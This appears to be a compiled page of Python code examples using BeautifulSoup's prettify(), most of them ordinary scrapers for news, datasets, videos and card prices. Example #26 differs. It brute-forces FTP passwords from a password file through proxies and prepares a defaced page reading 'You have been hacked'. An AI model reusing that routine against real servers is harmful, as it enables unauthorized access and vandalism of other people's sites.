Example #1
def scrape_home():
        page = requests.get(site)
        soup = BeautifulSoup(page.text)
        soup.prettify()
        for anchor in soup.findAll('a',{'class':'newsitem2'}):
                try:
                    #print "[+] Found article:"
                    title = anchor['title']
                    link = anchor['href']
                    dts = datetime.strptime(link[9:17], '%Y%m%d') # chop-chop goes the string
                    articleId = link[23:32] # more chop-chop, thx for consistent strings
                    # Debugging, printing output to screen
                    #print "Title: " + anchor['title']
                    #print "Date: " + str(dts)
                    #print "Link: " + anchor['href']
                    #print "ID: " + articleId
                    #print ""
                    #print dts
                    # Parse the link
                    # Pull out Date, ID, and full Link
                    if len(title) > 0: # If the link has a title, save into list
                            links.append(site + link)
                            titles.append(title)
                            storyID.append(articleId)

                except:
                    pass # Else, move on, don't save link
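For comparison, a minimal sketch of the same pattern on Python 3 with requests and bs4 (the newsitem2 class and the URL slice offsets are copied from the snippet above; site is assumed to be the base URL). Note that prettify() only returns a formatted string, so calling it without using the result, as most of these examples do, has no effect on the soup:

import requests
from bs4 import BeautifulSoup
from datetime import datetime

links, titles, storyID = [], [], []

def scrape_home(site):
    page = requests.get(site)
    soup = BeautifulSoup(page.text, 'html.parser')
    for anchor in soup.find_all('a', class_='newsitem2'):
        title = anchor.get('title')
        link = anchor.get('href')
        if not title or not link:
            continue
        dts = datetime.strptime(link[9:17], '%Y%m%d')  # date embedded in the link, as in the original
        article_id = link[23:32]                       # article ID embedded in the link
        links.append(site + link)
        titles.append(title)
        storyID.append(article_id)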
Example #2
def scrapeDataset(index):
  try:
    record = {}
    record['id'] = index
    url = baseUrl + str(index)
    record['url'] = url
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    print soup.prettify()
    content = soup.find('div',id='content')
    record['title'] = content.find('h1',{'class':'title'}).text
    ps = content.findAll('p')
  # record['created'] = ps[0].text
    record['categories'] = ps[1].text
  # record['description'] = ps[3:len(ps)]

    table = content.find('table',{'class':'dataset'})
    trs = table.findAll('tr')
    record['extent'] = trs[0].findAll('td')[0].text
    record['agency'] = trs[1].findAll('td')[0].text
    record['update_frequency'] = trs[2].findAll('td')[0].text
    record['date_range'] = trs[3].findAll('td')[0].text
    record['date_published'] = trs[4].findAll('td')[0].text
    record['date_of_last_revision'] = trs[5].findAll('td')[0].text
    record['license_summary'] = trs[6].findAll('td')[0].find('a')['href']
    distributions = trs[7:]
    dists = {}
    for dist in distributions:
      dists[dist.find('th').text] = dist.find('td').text
    record['distributions'] = dists
  # print(dists)
    scraperwiki.sqlite.save(unique_keys=['url'], data=[record])
  # print record
  except:
    pass
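The fixed-index row extraction above can also be written as a loop over a field list. A hedged sketch (the field order is copied from the snippet and assumed stable; trs and record are the same objects as above):

FIELDS = ['extent', 'agency', 'update_frequency', 'date_range',
          'date_published', 'date_of_last_revision']

def extract_fields(trs, record):
    # Pair each expected field name with the corresponding table row, in order
    for name, tr in zip(FIELDS, trs):
        record[name] = tr.findAll('td')[0].text
    return record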
Example #3
def getWishes(pseudo):
    lines = []
    pages = getPages(pseudo)
    if pages == 0:
        return
    for i in range(1,pages+1):
        page = urllib2.urlopen(url+'/page-'+str(i)).read()
        soup = BeautifulSoup(page)
        soup.prettify()
        for empty in soup.findAll("li",{"class" : "elco-collection-item-empty d-emptyMessage"}):
            print "Aborting : there isn't a single movie in your wishlist yet :("
            return
        for wish in soup.findAll("li",{"class" : "elco-collection-item"}):
            wish_json = '<li>'
            for element_title in wish.findAll("div",{"class" : "elco-collection-content"}):
                exist = False
                for title_original in element_title.findAll('span',{'class':'elco-original-title'}):
                    link = getLink(title_original.text.encode('utf-8'))
                    wish_json = wish_json + '<a href="' + str(link) + '">' + title_original.text.encode('utf-8') + '</a></li>'
                    lines.append(wish_json)
                    exist = True
                for title in element_title.findAll('a',{"class": "elco-anchor"}):
                    if exist is False:
                        link = getLink(title.text.encode('utf-8'))
                        wish_json = wish_json + '<a href="' + str(link) + '">' + title.text.encode('utf-8') + '</a></li>'
                        lines.append(wish_json)

    file = open(pseudo+'.html','w+')
    file.write('<html><body>')
    for line in lines:
        file.write(line)
    file.write('</body></html>')
    file.close()
Example #4
def scrape_article(link):
        r = requests.get(link)
        soup = BeautifulSoup(r.text)
        soup.prettify()
        story_text = soup.findAll('span',{'class':'StoryText'})
        stories.append(story_text)
        return True
Example #5
 def get_soup(self, geo_query_string):
     MAX_NUM_TRIES = 5
     
     if not geo_query_string:
         return(None)
     try:
         return(self._geo_soups[geo_query_string])
     except KeyError:
         num_tries = 0
         success = False
         getter = get_geo_page
         while (num_tries < MAX_NUM_TRIES and not success):
             raw_html = getter(geo_query_string)
             soup = BeautifulSoup(raw_html)
             # Verify we got a valid page
             try:
                 assert(soup.find(text="Status")) 
                 success = True
                 print("Got geo page for %s" %geo_query_string)
             except:
                 print("Couldn't get page for %s.  Sleeping and will try again" %geo_query_string)
                 time.sleep(2)
                 num_tries += 1
                 getter = uncached_get_geo_page
         if not success:
             print soup.prettify()
             raise Exception("Page for %s not retrieved.  Perhaps server down or no internet connection?" %geo_query_string)
         self._geo_soups[geo_query_string] = soup
         return(soup)
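The retry loop in the example above can be factored into a small helper. A sketch under the assumption that the page getter and the validity check are passed in (fetch_with_retry, is_valid, and max_tries are illustrative names, not part of the original code):

import time

def fetch_with_retry(fetch, query, is_valid, max_tries=5, delay=2):
    # Call fetch(query) until is_valid() accepts the result or we give up
    for attempt in range(max_tries):
        result = fetch(query)
        if is_valid(result):
            return result
        time.sleep(delay)
    raise Exception("Page for %s not retrieved after %d tries" % (query, max_tries))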
Example #6
def parse_speech(url):
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    content = soup.find('div', {'id' : 'mainColumn' })
    title = content.h1.text
    author = content.find('p', {'class' : 'detail'}).text[2:]
    position = content.p.nextSibling.text
    date_and_place = content.find('p', {'class' : 'detail alternate'})
    date = date_and_place.text.partition(',')[0]
    place = date_and_place.text.partition(',')[2]
    body = content.findAll(lambda tag: len(tag.name) == 1 and not tag.attrs)

    # Re-join the body, otherwise it shows up with array cruft in the JSON
    body = ''.join(str(tag) for tag in body)

    data['title'] = title
    data['body'] = body
    data['minister_name'] = author
    data['minister_position'] = position
    data['date'] = date
    data['where'] = place
    data['source_url'] = url
    data['department'] = 'Business, Innovation and Skills'
    print "Save: " + str(data)
    scraperwiki.sqlite.save(["title", "source_url"], data)
Example #7
def scrapeyear(url, year):
    seen_before = scraperwiki.metadata.get(url)
    if seen_before is not None:
        print "Seen before - skip: " + url
        return
    else:
        print "vinnum ur " + year
    data = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    
    table = soup.find('table', {'id' : 'mot-tafla'})
    trs = table.findAll('tr')
    for td in trs[1:]:
         items = td.findAll('td')
         slod = 'http://www.ksi.is/mot/motalisti/' + items[1].a['href']
         motanumer = re.sub('http:\//www.ksi.is\/mot\/motalisti\/urslit-stada/\?MotNumer=','',slod)
         mot = items[1].text
         flokkur = items[3].text
         data['slod'] = slod
         data['year'] = year
         data['motanumer'] = motanumer
         data['flokkur'] = flokkur
         data['mot'] = mot

         #print data
         print "vistum " + year
         scraperwiki.datastore.save(["mot", "year"], data) 
         scraperwiki.metadata.save(url,"1")  
Example #8
 def getcontentparas(self, html, domain):
     bs = BeautifulSoup(html)
     bs.prettify()
     body = []
     try:
         if domain == "engadget":
             body = bs.findAll('div', attrs={'class':'post_body'})[0].contents
             body = body[2:len(body)-4]
         elif domain == "mashable":
             body = bs.findAll('div', attrs={'class':'description'})
         elif domain == "techcrunch":
             body = bs.findAll('div', attrs={'class':'body-copy'})[0].contents
         elif domain == "huffingtonpost":
             body = bs.findAll('div', attrs={'class':'entry_body_text'})[0].contents
             body = body[3:len(body)-10]
         elif domain == "treehugger":
             body = bs.findAll('div', attrs={'id':'entry-body'})[0].contents
         elif domain == "businessinsider":
             x = bs.findAll('div', attrs={'class':'KonaBody post-content'})
             if type(x) is list:
                 body = x[0].contents
                 body = body[1:len(body)]
             elif x:
                 body = x
             else:
                 print "body not initialized: "
         #print body
         blogparas = ""
         blogparas = self.getparas(body)
         return blogparas
     except:
         print "para not found: "
         return "0"
Example #9
def scrape_safn(url):
        html = scraperwiki.scrape(url)
        soup = BeautifulSoup(html)
        soup.prettify()

        # Loop through all links that have class=headnews
        frettir = soup.findAll('a', { "class" : "headnews" })
Example #10
 def scrape_videos(self, br, htmlscraper, parser, wpPost, videoUrls):
     postList = wpPost.get_posts(10000)
     for i in range(len(videoUrls)):
         try:
             print "---------------------" + str(i) + " from " + str(len(videoUrls)) + "------------------------"
             title = htmlscraper.convert_hypen_into_space(parser.split_url(videoUrls[i]))
             print "title: " + htmlscraper.uppercase_first_letter_from_string(title)
             if (self.dataHandler.is_this_item_on_the_list(title, postList)):
                 print "Content already posted"
             else:
                 print "Video scraping started ..."
                 tags = htmlscraper.convert_title_to_categories(str(title))
                 soup = BeautifulSoup(br.scrap_website(videoUrls[i]))
                 soup.prettify()
                 thumbnail = parser.get_thumbnail(soup)
                 print "thumbnail: " + thumbnail
                 paraVideo = parser.parse_video_id(videoUrls[i])
                 iframe = parser.create_video_iframe(paraVideo[0], paraVideo[1])
                 print "iframe: " + iframe
                 video_duration = parser.get_duration(soup)
                 print "video duration: " + video_duration
                 embedurl = htmlscraper.parse_src_from_video_iframe(iframe)
                 print "embedurl " + embedurl
                 duration_for_snippets = parser.prepare_duration_for_snippets(video_duration)
                 print "duration for snippets: " + duration_for_snippets
                 print "Wordpress post creator starting ..."
                 wpPost.createPost(title, thumbnail, iframe, video_duration, duration_for_snippets, tags, embedurl)
                 print "Scraped video [OK]"
         except:
             pass
Example #11
def getDescription(url):
	sizeToReturn = 200
	
	request = urllib2.Request(url) #create a request
	request.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4')  #http://whatsmyuseragent.com/
	opener = urllib2.build_opener()
	response = opener.open(request)
	feeddata = response.read() #feeddata is the html data received
	response.close()
	opener.close()
	soup = BeautifulSoup(''.join(feeddata))  #make it into beautifulsoup
	soup.prettify() # prettify() returns a formatted string; it does not modify the soup
	paras = soup.findAll('p')
	
	
	
	i = 0
	text = ''
	for pa in paras:
		for res in pa.findAll(text=True):
			if(i > 2):
				text = text + res
		i = i + 1
	
	
	textToReturn = text.replace('\n','  ')
	
	textToReturn = textToReturn.ljust(sizeToReturn)
	return textToReturn[0:sizeToReturn]
Example #12
def getTVTree(url):
    data = common.getURL(url)
    scripts = re.compile(r'<script.*?script>', re.DOTALL)
    data = scripts.sub('', data)
    style = re.compile(r'<style.*?style>', re.DOTALL)
    data = style.sub('', data)
    tree = BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    atf = tree.find(attrs={'id': 'atfResults'})
    if atf == None:
        print tree.prettify()
        return False
    atf = tree.find(attrs={'id': 'atfResults'}).findAll('div', recursive=False)
    try:
        btf = tree.find(attrs={
            'id': 'btfResults'
        }).findAll(
            'div', recursive=False)
        atf.extend(btf)
        del btf
    except:
        print 'AMAZON: No btf found'
    nextpage = tree.find(attrs={
        'title': 'Next page',
        'id': 'pagnNextLink',
        'class': 'pagnNext'
    })
    del data
    return atf, nextpage
Example #13
def read_manga(params):

	link='http://manga24.ru/%s'%params['m_path']
	print link
	http = GET(link)
	if http == None: return False
	beautifulSoup = BeautifulSoup(http)
	beautifulSoup.prettify()
	body=str(beautifulSoup).split('\n')
	d_f=None
	i_f=None
	url=''
	imgs=[]
	pat=re.compile(r'[a-zA-Z0-9-_.!]+\.(?:png|jpg|PNG|JPG)', re.S)
	for line in body:
		if line.split(':')[0].find('dir')>0 and not d_f:
			url=line.split('"')[1].replace('\\/','/')
			d_f=True
		if line.split(':')[0].find('images')>0 and not i_f:
			imgs = re.findall(pat, line)
			i_f=True
	for ism in imgs:
		try:
			mm=xbmcgui.ListItem(ism,addon_icon,addon_icon)
			xbmcplugin.addDirectoryItem(hos,url+ism,mm,False)
			print ism
		except: pass

	xbmcplugin.endOfDirectory(handle=hos, succeeded=True, updateListing=False, cacheToDisc=True)
Example #14
	def __getStationImage(self):
		img = None

		opener = urllib2.build_opener(urllib2.HTTPCookieProcessor)

		soup = None
		print "Connecting to " + self.url
		try:
			response = opener.open(self.url)
			data = response.read()
			soup = BeautifulSoup(data)
			soup.prettify()
			print "Connection OK"
		except urllib2.HTTPError:
			print "ERROR in connection"

		if (soup):
			img = str(soup)
			try:
				img = re.findall('[fF]oto\=.+\&amp\;lenguaje', img)[0]
				img = re.sub('([fF]oto\=\s?|\&amp\;lenguaje)', '', img)
				img = 'http://www.ingurumena.ejgv.euskadi.net' +  urllib.quote(img)
			except:
				img = None

		return img
Example #15
def query_chaoscards (card_number):
    result = {}

    card_number = card_number.replace ("_", ":").replace ("-", ":");

    print card_number;

    url = 'http://www.chaoscards.co.uk/rss/1/productlistings_rss/c84:' + card_number
    page = urllib2.urlopen (url).read ()

    soup = BeautifulSoup (page)

    item = soup.find ('item');

    if not hasattr (item, 'guid'):
        return;

    url = item.guid.contents[0]
    page = urllib2.urlopen (url).read ()

    soup = BeautifulSoup (page)
    soup.prettify ()

    price = soup.find (id='price_break_1').span.span.span.contents[0]
    r = price_regex.search(str (price))
    price = r.groups ()[0]

    result = {
        'card_number': card_number,
        'card_name': soup.find (id='product_title').contents[0],
        'price': price
    }

    return result
Example #16
def query_koolkingdoms (card_number):
    result = {}
    url = 'http://www.koolkingdom.co.uk/acatalog/info_' + card_number + '.html';
    try:
        try:
            #Attempt to get page with standard URL
            page = urllib2.urlopen(url).read();
        except urllib2.HTTPError:
            #On failure attempt alternative
            page = urllib2.urlopen(url.replace ("_", "-")).read()
    except urllib2.HTTPError:
        print card_number + " could not be found"
        return result;

    soup = BeautifulSoup(page)
    soup.prettify()

    card_name = soup.title.string

    price = soup.find('actinic:prices').span
    r = price_regex.search(str (price))
    price = r.groups ()[0]

    result = {
        'card_number': card_number,
        'card_name': card_name,
        'price': price
    }

    return result;
Example #17
def google_backlinks(domain):
    try:
        logger.info("begin google_backlinks for domain %s" % domain)
        import urllib
        import urllib2
        from BeautifulSoup import BeautifulSoup
        #from http://stackoverflow.com/questions/802134/changing-user-agent-on-urllib2-urlopen
        url = "https://www.google.com/search?q=%s".format(domain,domain)
        keyword = '"{0}" -site:{1}'.format(domain,domain)
        url = (url % urllib.quote_plus(keyword))
        logger.info(url)
        headers = { 'User-Agent' : 'Mozilla/5.0' }
        req = urllib2.Request(url, None, headers)
        html = urllib2.urlopen(req).read()

        soup = BeautifulSoup(html)
        soup.prettify()
        result =soup.find("div",{"id": "resultStats"}).string
        logger.info("Results %s" %  result)
        if result:
            if result=='1 result':
                return 1
            result = result.lower().replace("about ","")
            result = result.replace(" results","")
            result = result.replace(',','')
        else:
            result= 0

        logger.info("google_backlinks domain %s results %s" % (domain, result))
        return result
    except Exception,e:
        logger.error(e)
        return -1
Example #18
def httpParse(tempname):
    """parse http or https links in the downloaded webpage"""
    the_page = open('temp/'+tempname, 'r').read()
    soup = BeautifulSoup(the_page)
    soup.prettify()
    all_links = []
    temp_links = []

    #TODO: add images or other links apart from href?
    #TODO: this saves all links local and http/https - need to parse
    for anchor in soup.findAll('a', href=True):
        #print anchor['href']
        # use unicode to make links non-navigable
        link = unicode(anchor['href'])
        all_links.append( link )

        # create link set from list_of_links
        split_link = link.split("/")
        # if external link
        if 'http' in split_link[0]:
            temp_links.append(split_link[2])
    #for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')):
    #	if link.has_attr('href'):
    #		print link['href']
    #return link['href']

    # take set of external links
    link_set = list(set(temp_links))

    return all_links, link_set
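Splitting on '/' to detect external links is fragile; the standard library's urlparse does the same job more robustly. A sketch assuming the same all_links list built above (on Python 3 the import would come from urllib.parse instead):

from urlparse import urlparse

def external_hosts(all_links):
    # Collect the distinct hosts of absolute http/https links
    hosts = set()
    for link in all_links:
        parsed = urlparse(link)
        if parsed.scheme in ('http', 'https'):
            hosts.add(parsed.netloc)
    return list(hosts)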
Example #19
def processEpisodes(url):
    data = common.getURL(url)
    remove = re.compile('<script.*?script>', re.DOTALL)
    data = re.sub(remove, '', data)
    remove = re.compile('<\\!--.*?-->', re.DOTALL)
    data = re.sub(remove, '', data)
    htmldata = demjson.decode(data)['display']
    remove = re.compile('"<div.*?div>"')
    htmldata = re.sub(remove, '""', htmldata)
    tree=BeautifulSoup(htmldata, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    episodes = tree.findAll('div',attrs={'class':re.compile('video-image-wrapper video')})
    if len(episodes) == 0:
        return False
    for episode in episodes:
        print episode.prettify()
        url = episode.find('a')['href']
        name = episode.find('img')['title']
        thumb = episode.find('img')['src']
        u = sys.argv[0]
        u += '?url="'+urllib.quote_plus(url)+'"'
        u += '&mode="lifetime"'
        u += '&sitemode="playepisode"'
        infoLabels={ "Title":name,
                    "TVShowTitle":common.args.name}
        common.addVideo(u,name,thumb,infoLabels=infoLabels)
    return True
Example #20
def scrape_skjalfta(url):
        html = scraperwiki.scrape(url)
        soup = BeautifulSoup(html)
        soup.prettify()
        table = soup.find ('table', { 'width' : '80%' })
        trs = table.findAll('tr')
        for tr in trs:
            date = tr.findNext('td')
            date_store = re.sub(" \d+:\d+","",date.text)
            date_time = date.text
            time = re.sub("\d+-\d+-\d+ ","",date.text)
            location=date.findNext('td')
            lat = location.text[:4]
            lng = location.text[5:]
            latlng = [lat,lng]
            latlng_float= map(float, latlng)
            size=location.findNext('td')
            distance=size.findNext('td')
            landmark=distance.findNext('td')
            quake['date'] = date_store
            quake['time'] = time
            quake['date_time'] = date_time
            quake['lat'] = lat
            quake['lng'] = lng
            quake['size'] = size.text
            quake['distance'] = distance.text
            quake['landmark'] = landmark.text
            print quake
            scraperwiki.datastore.save(["date_time"], quake, latlng=(latlng_float))
Example #21
def play():
    smilurl=common.args.url
    swfUrl = 'http://www.bravotv.com/_tp/pdk/swf/flvPlayer.swf'
    if (common.settings['enableproxy'] == 'true'):proxy = True
    else:proxy = False
    data = common.getURL(smilurl,proxy=proxy)
    tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:'+playpath
                else:
                    playpath = playpath.replace('.flv','')
                finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                finalurl = item['src']
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
Example #22
def addSection(link, title):
    if not 'http' in link:
        page = urllib2.urlopen('http://www.paulgraham.com/'+link).read()
        soup = BeautifulSoup(page)
        soup.prettify() 
    else:
        page = urllib2.urlopen(link).read()
        
    section = ez_epub.Section()
    try:
        section.title = title
        print section.title

        if not 'http' in link:
            font = str(soup.findAll('table', {'width':'455'})[0].findAll('font')[0])
            if not 'Get funded by' in font and not 'Watch how this essay was' in font and not 'Like to build things?' in font and not len(font)<100:
                content = font
            else:
                content = ''
                for par in soup.findAll('table', {'width':'455'})[0].findAll('p'):
                    content += str(par)

            for p in content.split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))

            #exception for Subject: Airbnb
            for pre in soup.findAll('pre'):
                section.text.append(genshi.core.Markup(pre))
        else:
            for p in str(page).replace("\n","<br />").split("<br /><br />"):
                section.text.append(genshi.core.Markup(p))
    except:
        pass
    
    return section
Example #23
def send_sms(toMobileNo, textMsg):
    token = open_main_and_get_token()
    post_props, form = open_send_sms_url(token)

    mob_no_param = get_mob_no_param(form)
    token_param = get_token_param(form)

    post_props[mob_no_param] = toMobileNo
    post_props[token_param] = token
    post_props['textArea'] = textMsg
    post_props['nrc'] = 'nrc'
    post_props['wasup'] = 'push358'
    post_props['HiddenAction'] = 'instantsms'
    post_props['chkall'] = 'instantsms'

    post_data = urllib.urlencode(post_props)

    if (_DEBUG == True):
        print 'Generated Post Props:'
        print post_props
        print 'Generated Post_data:'
        print post_data

    fp = URL_OPENER.open(WAY_TO_SMS_SEND_SMS_POST_URL,post_data)
    if (_DEBUG == True):
        soup=BeautifulSoup(fp.read())
        print soup.prettify()
    print '\tSMS chunk sent!'
Example #24
def play():
    smilurl=common.args.url
    #+'&manifest=m3u'
    swfUrl = 'http://www.syfy.com/_utils/video/codebase/pdk/swf/flvPlayer.swf'
    if (common.settings['enableproxy'] == 'true'):proxy = True
    else:proxy = False
    data = common.getURL(smilurl,proxy=proxy)
    tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
    print tree.prettify()
    rtmpbase = tree.find('meta')
    if rtmpbase:
        rtmpbase = rtmpbase['base']
        items=tree.find('switch').findAll('video')
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        for item in items:
            bitrate = int(item['system-bitrate'])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
                playpath = item['src']
                if '.mp4' in playpath:
                    playpath = 'mp4:'+playpath
                else:
                    playpath = playpath.replace('.flv','')
                finalurl = rtmpbase+' playpath='+playpath + " swfurl=" + swfUrl + " swfvfy=true"
    else:
        #open m3u
        data = common.getURL(smilurl+'&manifest=m3u',proxy=proxy)
        tree=BeautifulSoup(data, convertEntities=BeautifulSoup.HTML_ENTITIES)
        print tree.prettify()
        items=tree.find('seq').findAll('video')
        item=items[0]
        hbitrate = -1
        sbitrate = int(common.settings['quality']) * 1024
        #for item in items:
        #    bitrate = int(item['system-bitrate'])
        #    if bitrate > hbitrate and bitrate <= sbitrate:
        #        hbitrate = bitrate
        m3u8url = item['src']
        origfilename=m3u8url.split('/')[-1]
        data = common.getURL(m3u8url,proxy=proxy)
       # lines=data.splitlines()
        #print "D",data
        #bitrate on url isn't used
        #.split('b__=')[0]+'b__='+common.settings['quality']
        #print data
        items=re.compile('BANDWIDTH=(\d*).*\n(.*)(\n)').findall(data)
        #print "%^&^",items
        for item in items:
            #print line

            bitrate = int(item[0])
            if bitrate > hbitrate and bitrate <= sbitrate:
                hbitrate = bitrate
               # print "BR",bitrate
                filename = item[1]
        finalurl=m3u8url.replace(origfilename,filename)
    item = xbmcgui.ListItem(path=finalurl)
    xbmcplugin.setResolvedUrl(pluginhandle, True, item)
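The manual highest-bitrate search over the m3u8 master playlist can also be expressed with max(). A hedged sketch (assumes data holds the playlist text and sbitrate the configured bitrate cap, as in the snippet above):

import re

def pick_variant(data, sbitrate):
    # (bandwidth, filename) pairs parsed from the master playlist
    variants = re.compile(r'BANDWIDTH=(\d+).*\n(.*)\n').findall(data)
    candidates = [(int(bw), name) for bw, name in variants if int(bw) <= sbitrate]
    if not candidates:
        return None
    return max(candidates)[1]  # filename of the best variant under the cap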
Example #25
    def summary(self):
        self.infolist.sort(key=lambda generalinfo: generalinfo.contestrank)

        now = datetime.datetime.now()
        otherStyleTime = now.strftime("%Y-%m-%d")
        timestring = time.asctime()
        file = open('Summary@' + otherStyleTime + '.html', 'w')
        filecopy = open('Summary.html', 'w')
        body = ''
        head = '''
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html" charset = "utf-8">
	<title>Board|Contest Rating System</title>
	<link rel="stylesheet" href="board.css" type="text/css" />
</head>
<body>
    <div class="container">
'''
        tail = '<div class="footer"><p>Generated At : ' + timestring + '</p></div></body></html>'
        title = '<h1> NWPU Team Contest @ ' + otherStyleTime + '</h1>'
        tablehead = '''
        <table id="crsboard">
		<thead>
			<th> Rank </th>
			<th> Nickname </th>
			<th> TeamName </th>
			<th> Member </th>
			<th> New Rating </th>
			<th> Old Rating </th>
			<th> Change </th>
		</thead>'''
        cnt = 1
        for i in self.infolist:
            cnt += 1
            if cnt % 2 == 0:
                body += '<tr class="row1">' + '\n'
                if 1:
                    body += self.rankcolor(i.contestrank)
                    body += '<th> ' + str(i.nickname) + ' </th>\n'
                    body += '<th> ' + (i.realname).decode('utf-8') + ' </th>\n'
                    body += self.numcolor(int(i.newrating)) + '\n'
                    body += self.numcolor(int(i.oldrating)) + '\n'
                    body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
                body += '</tr>' + '\n'
            if cnt % 2 == 1:
                body += '<tr class="row2">' + '\n'
                if 1:
                    body += self.rankcolor(i.contestrank)
                    body += '<th> ' + str(i.nickname) + ' </th>' + '\n'
                    body += '<th> ' + (i.realname) + ' </th>' + '\n'
                    body += self.numcolor(int(i.newrating)) + '\n'
                    body += self.numcolor(int(i.oldrating)) + '\n'
                    body += self.posneg(int(i.newrating - i.oldrating)) + '\n'
                body += '</tr>' + '\n'
        htmlraw = head + title + tablehead + body + tail
        htmlcode = BeautifulSoup(htmlraw)
        file.write(htmlcode.prettify())
        filecopy.write(htmlcode.prettify())
Example #26
    def change_data_file(self, login_to_server, ip, file_name, ):
        self.login_to_server = login_to_server
        # self.pas_for_ftp = pas_for_ftp
        self.ip = ip
        self.file_name = file_name


        file = "pasw.txt"
        br = Anon(useragent, proxies)
        pf = open(file, 'r') #open a password file
        for line in pf.readlines():
            pas_for_ftp = line.strip('\r').strip('\n')
            try:
                print "login_to_server - ", self.login_to_server
                # print "pas_for_ftp - ", self.pas_for_ftp
                print "IP - ", self.ip
                print "file_name - ", self.file_name

                url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/"
                print url
                url2 = url + self.file_name
                print url2

                response = br.open(url2)
                soup = BeautifulSoup(response.get_data())
                b = soup.prettify()
                tag = soup.body
                tag.clear()
                soup = BeautifulSoup("<body></body>")
                original_tag = soup.body
                new_tag = soup.new_tag("p")
                original_tag.append(new_tag)
                tag = soup.p
                tag.string = "You have been hacked"
                a = soup.prettify()
                print "File on server: ", b
                print "File's change: ", a
                request = Request(url2, data=b)
                request.get_host()
                request.get_data()
                print "Done!"
                break



                # response = br.open(url2)
                # html = br.response().get_data().replace("</b>", "< /b>")
                # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
                # br.set_response(response)



                # html = br.response().get_data().replace(b, a)
                # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
                # br.set_response(response)
                # html2 = br.request().get_data().replace(b, a)
                # mechanize.request_host(html2)
            except:
                print "[*]password", pas_for_ftp, "is incorrect"
Example #27
 def _fix_document(self, doc, use_soup=False):
     if use_soup:
         soup = BeautifulSoup(doc)
         soup.prettify()
         doc = unicode(soup)
     else:
         doc = tidy(doc)
     return doc
Example #28
 def process_response(self, request, response):
     if 'text/html' in response['Content-Type']:
         soup = BeautifulSoup(response.content)
         try:
             response.content = soup.prettify(spacesPerLevel=4)
         except TypeError, e:    # not alanjds' flavor of Soup
             # so, use official Soup flavor...
             response.content = soup.prettify()
Example #29
def scrape_aircraft(url):
    aircraft = {}
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    for br in soup.findAll('br'):
        br.replaceWith(', ')

    #First table
    table = soup.find('table', {'class' : 'craft' })

    registration_id = table.findNext('tr')
    aircraft['registration_id'] = re.sub("Einkennisstafir:","",registration_id.text)
    registration_nr = registration_id.findNext('tr')
    aircraft['registration_nr'] = re.sub('Skr\xe1ningarn\xfamer:',"",registration_nr.text)
    registration_id = re.sub("Einkennisstafir:","",registration_id.text)
    
    #Second table
    table = table.findNext('table', {'class' : 'craft' })
    make = table.findNext('tr')
    aircraft['make'] = re.sub("Tegund:","",make.text)
    production_year = make.findNext('tr')
    aircraft['production_year'] = re.sub("Framlei\xf0slu\xe1r:","",production_year.text)    
    serial_nr = production_year.findNext('tr')
    aircraft['serial_nr'] = re.sub("Ra\xf0n\xfamer:","",serial_nr.text)    
    
    #Third table
    table = table.findNext('table', {'class' : 'craft' })
    max_weight = table.findNext('tr')
    aircraft['max_weight'] = re.sub("H\xe1marks\xfeungi:","",max_weight.text)
    passenger_nr = max_weight.findNext('tr')
    passenger_nr = re.sub('Far\xfeegafj\xf6ldi:',"",passenger_nr.text)
    if passenger_nr == u"Ekki skr\xe1\xf0ur":
        passenger_nr = "n/a"
    aircraft['passenger_nr'] = passenger_nr

    #Fourth table
    table = table.findNext('table', {'class' : 'craft' })
    owner = table.findNext('tr')
    aircraft['owner'] = re.sub("Eigandi:","",owner.text)
    address = owner.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['owner_address'] = address.text

    #Fifth table
    table = table.findNext('table', {'class' : 'craft' })
    operator = table.findNext('tr')
    aircraft['operator'] = re.sub("Umr\xe1\xf0andi:","",operator.text)
    address = operator.findNext('tr')
    address = address.findNext('td')
    address = address.findNext('td')
    aircraft['operator_address'] = address.text
    scraperwiki.datastore.save(["registration_id"], aircraft)
    scraperwiki.metadata.save(url, '1')

    print aircraft
Example #30
def scrape_test_center_next_page(url):
    html = scraperwiki.scrape(url)
    soup = BeautifulSoup(html)
    soup.prettify()
    div = soup.find('div', 'formtext first')
    links = div.findAll('a')
    for a in links:
        url = 'http://www.dft.gov.uk/dsa/' + a['href']
        scrape_test_center(url)
Example #31
import urllib2, os
from BeautifulSoup import BeautifulSoup

page = urllib2.urlopen(
